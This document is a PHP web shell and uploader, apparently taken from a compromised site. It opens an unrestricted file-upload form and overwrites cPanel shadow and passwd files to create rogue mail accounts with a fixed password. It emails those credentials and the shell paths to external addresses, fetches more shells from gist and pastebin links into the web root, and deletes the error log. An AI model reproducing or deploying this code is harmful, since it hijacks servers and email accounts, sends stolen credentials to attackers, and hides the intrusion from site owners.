dzff"

1.  
2.  
3. <center>
4.  
5. <style>
6.  
7. body {
8. background: url(https://i.skyrock.net/3641/79723641/pics/3063438997_1_3_0OUIOSkd.gif) no-repeat center center fixed;
9. -webkit-background-size: cover;
10. -moz-background-size: cover;
11. -o-background-size: cover;
12. background-size: cover;
13. color: rgba(255, 255, 255, 0.25);
14. text-align: center;
15. margin: 0;
16.  
17. }
18. </style>
19.  
20. <?php
21. echo '<center><h1>UPLOADER BY ./IzunaWeb & Madara</h1>'.'<br>'.'Uname : '.php_uname().'<br> Posisi : '.$cwd = getcwd(); Echo '<br><br><center> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> </form> </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads'])) { move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']); Echo "<script>alert('upload Done'); </script><b>DR SH3LL A FAIT SON BOULOT ;)</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; }
22. @ini_set('output_buffering', 0);
23. set_time_limit(0);
24. ini_set('memory_limit', '64M');
25. ini_set('max_execution_time',0);
26.  
27. $ips = getenv('REMOTE_ADDR');
28.  
29. $wr = 'infos:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
30. hussam:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
31. abi_layla:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
32. accountmu:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
33. adminustratro:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
34. salesman:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
35. ';
36. $hm = 'infos:x:534:532::/home/$user/mail/$t/info:/home/$user
37. hussam:x:534:532::/home/$user/mail/$t/hussam:/home/$user
38. abi_layla:x:534:532::/home/$user/mail/$t/jancok:/home/$user
39. accountmu:x:534:532::/home/$user/mail/$t/account:/home/$user
40. adminustratro:x:534:532::/home/$user/mail/$t/t:/home/$user
41. salesman:x:534:532::/home/$user/mail/$t/salesman:/home/$user
42. ';
43. $ports=array(25, 587, 465, 110, 995, 143 , 993);
44. $primary_port='25';
45. $user=get_current_user();
46. $password='kontol87';
47. $pwd = crypt($password,'$6$kontol87$');
48. $t = $_SERVER['SERVER_NAME'];
49. $t = @str_replace("www.","",$t);
50. @$passwd = file_get_contents('/home/'.$user.'/etc/'.$t.'/shadow');
51. $ex=explode("\r\n",$passwd);
52. @link('/home/'.$user.'/etc/'.$t.'/shadow','/home/'.$user.'/etc/'.$t.'/shadow.kontol87.bak');
53. @unlink('/home/'.$user.'/etc/'.$t.'/shadow');
54. foreach($ex as $ex){
55. $ex=explode(':',$ex);
56. $e= $ex[0];
57. if ($e){
58. $b=fopen('/home/'.$user.'/etc/'.$t.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."\r\n");fclose($b);
59. echo '<center><span style=\'color:#00ff00;\'>'.$t.'|25|'.$e.'@'.$t.'|'.$password.'<br>';
60. }}
61. $c = fopen('/home/'.$user.'/etc/'.$t.'/passwd', 'a+');
62. fwrite($c, $hm);
63. fclose($c);
64. $f = fopen('/home/'.$user.'/etc/'.$t.'/shadow', 'a+');
65. fwrite($f, $wr);
66. fclose($f);
67. $parm = 'https://'.$t.':2096';
68. $peli = 'D-nCtnVO%JNl';
69. $kirim = '
70.  
71. SMTP AUTO CREATE
72.  
73. '.$t.'|25|'.$e.'@'.$t.'|'.$password.'
74. --------------------------------------------
75. '.$parm.' | infos@'.$t.' | ' .$peli.'
76. '.$parm.' | hussam@'.$t.' | ' .$peli.'
77. '.$parm.' | abi_layla@'.$t.' | ' .$peli.'
78. '.$parm.' | accountmu@'.$t.' | ' .$peli.'
79. '.$parm.' | adminustratro@'.$t.' | ' .$peli.'
80. '.$parm.' | salesman@'.$t.' | ' .$peli.'
81.  
82.  
83. ';
84. header('Content-Type: text/html; charset=UTF-8');
85. $tujuanmail = 'tampungan.bakdur@gmail.com,kefiex@hotmail.com';
86. $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
87. $pesan_alert = "Wso - /wp-includes/js/include.php \n idbv2 - /wp-content/themes/anu.php \n uploader - /wp-admin/user/.wsa.php \r\n [ " . $_SERVER['SERVER_NAME'] . " ]";
88. mail($tujuanmail, "Plugin Auto Wget", $pesan_alert, $kirim);
89. function http_get($url){
90. $im = curl_init($url);
91. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
92. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
93. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
94. curl_setopt($im, CURLOPT_HEADER, 0);
95. return curl_exec($im);
96. curl_close($im);
97. }
98. $check1 = $_SERVER['DOCUMENT_ROOT'] . "/cache/include.php" ;
99. $text1 = http_get('https://gist.githubusercontent.com/obik87/fdaecaeda894cc9853ea53da1d1940fc/raw/92f687949dbf8a1ef37ef5e592fb8bfdde1a7ab3/waa');
100. $open1 = fopen($check1, 'w');
101. fwrite($open1, $text1);
102. fclose($open1);
103. if(file_exists($check1)){
104. }
105. $check2 = $_SERVER['DOCUMENT_ROOT'] . "/admin/anu.php" ;
106. $text2 = http_get('https://gist.githubusercontent.com/obik87/fdaecaeda894cc9853ea53da1d1940fc/raw/92f687949dbf8a1ef37ef5e592fb8bfdde1a7ab3/waa');
107. $open2 = fopen($check2, 'w');
108. fwrite($open2, $text2);
109. fclose($open2);
110. if(file_exists($check2)){
111. }
112. $check3 = $_SERVER['DOCUMENT_ROOT'] . "/upload/.wsa.php" ;
113. $text3 = http_get('https://pastebin.com/raw/BbcCvJ9S');
114. $open3 = fopen($check3, 'w');
115. fwrite($open3, $text3);
116. fclose($open3);
117. if(file_exists($check3)){
118. }
119. $check21 = $_SERVER['DOCUMENT_ROOT'] . "/+.php" ;
120. $text21 = http_get('https://pastebin.com/raw/XewAB4M0');
121. $open21 = fopen($check21, 'w');
122. fwrite($open21, $text21);
123. fclose($open21);
124. if(file_exists($check21)){
125. }
126. unlink("error_log");
127. ?>